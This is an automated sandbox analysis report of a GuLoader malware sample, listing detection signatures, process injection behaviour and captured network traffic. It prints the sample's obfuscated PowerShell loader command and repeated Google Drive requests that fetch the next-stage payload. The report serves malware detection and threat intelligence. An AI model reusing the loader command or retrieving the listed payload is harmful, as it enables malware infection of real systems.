Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LMSxhK1u8Z.exe

Overview

General Information

Sample name:LMSxhK1u8Z.exe
renamed because original name is a hash value
Original sample name:fe05b02fda8dc707ceb4143b4a2e4d6553d5410f226907cf0ae318b54edf28b2.exe
Analysis ID:1588662
MD5:f2827f013a265de94993c62bf9756b00
SHA1:9cc4cc403434e08c9c2e2ab312980cad6b2470ca
SHA256:fe05b02fda8dc707ceb4143b4a2e4d6553d5410f226907cf0ae318b54edf28b2
Tags:exeGuLoadersigneduser-adrian__luca
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • LMSxhK1u8Z.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\LMSxhK1u8Z.exe" MD5: F2827F013A265DE94993C62BF9756B00)
    • powershell.exe (PID: 7360 cmdline: "powershell.exe" -windowstyle minimized "$Yderpunktets=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Jul.Emb';$Disna=$Yderpunktets.SubString(22405,3);.$Disna($Yderpunktets)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Calcifuge.exe (PID: 7824 cmdline: "C:\Users\user\AppData\Local\Temp\Calcifuge.exe" MD5: F2827F013A265DE94993C62BF9756B00)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2918084212.0000000001805000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000001.00000002.2002927074.0000000009A85000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Yderpunktets=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Jul.Emb';$Disna=$Yderpunktets.SubString(22405,3);.$Disna($Yderpunktets)" , CommandLine: "powershell.exe" -windowstyle minimized "$Yderpunktets=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Jul.Emb';$Disna=$Yderpunktets.SubString(22405,3);.$Disna($Yderpunktets)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LMSxhK1u8Z.exe", ParentImage: C:\Users\user\Desktop\LMSxhK1u8Z.exe, ParentProcessId: 7284, ParentProcessName: LMSxhK1u8Z.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Yderpunktets=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Jul.Emb';$Disna=$Yderpunktets.SubString(22405,3);.$Disna($Yderpunktets)" , ProcessId: 7360, ProcessName: powershell.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-11T03:52:30.599048+010028032702Potentially Bad Traffic192.168.2.449736172.217.16.206443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeReversingLabs: Detection: 57%
      Multi AV Scanner detection for submitted file
      Source: LMSxhK1u8Z.exeVirustotal: Detection: 72%Perma Link
      Source: LMSxhK1u8Z.exeReversingLabs: Detection: 57%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
      Source: LMSxhK1u8Z.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:49736 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.129:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53462 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53464 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53468 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53500 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53534 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53568 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53585 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53602 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53618 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53635 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53650 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53666 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53683 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53700 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53727 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53757 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53773 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53775 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53777 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53785 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53787 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53789 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53791 version: TLS 1.2
      Source: Binary string: stem.Core.pdb@8 source: powershell.exe, 00000001.00000002.1994611870.00000000078E9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdb source: Calcifuge.exe, 00000006.00000001.1984960895.0000000000649000.00000020.00000001.01000000.00000008.sdmp
      Source: Binary string: stem.Core.pdb source: powershell.exe, 00000001.00000002.1994611870.00000000078E9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Calcifuge.exe, 00000006.00000001.1984960895.0000000000649000.00000020.00000001.01000000.00000008.sdmp
      Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2000880429.0000000008AA9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.1985666150.00000000033A5000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeCode function: 0_2_004055D5 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004055D5
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeCode function: 0_2_00406089 FindFirstFileW,FindClose,0_2_00406089
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeCode function: 0_2_00402706 FindFirstFileW,0_2_00402706
      Source: global trafficTCP traffic: 192.168.2.4:53456 -> 162.159.36.2:53
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 172.217.16.206:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
